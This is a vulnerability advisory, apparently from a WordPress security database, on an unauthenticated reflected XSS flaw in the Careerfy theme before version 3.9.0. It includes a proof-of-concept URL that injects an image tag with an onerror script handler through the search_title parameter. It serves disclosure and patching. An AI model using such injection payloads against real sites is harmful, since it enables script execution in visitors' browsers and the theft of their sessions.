Themes Vulnerabilities

Careerfy < 3.9.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

There is a XSS vulnerability in Careerfy.

Proof of Concept

https://careerfy.net/demo/jobs-listing/?search_title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&location=&loc_radius=50&sector_cat=

Affects Themes

careerfy
Fixed in 3.9.0

References

CVE
CVE-2022-1169
URL
https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Submitter twitter
DanielRufde
Verified
Yes
WPVDB ID
f3a1dcad-528a-4ecc-ac8e-728caa7c9878

Timeline

Publicly Published
2020-06-03 (about 3 years ago)
Added
2020-06-03 (about 3 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2023-09-22
Title
Copy Anything to Clipboard < 2.6.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Published
2020-06-03
Title
JobSearch < 1.5.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Published
2023-02-24
Title
All in One SEO Pack < 4.3.0 - Contributor+ Stored XSS
Published
2023-08-10
Title
Store Locator WordPress < 1.4.13 - Reflected XSS
Published
2023-10-23
Title
Advanced Menu Widget <= 0.4.1 - Contributor+ Stored XSS via Shortcode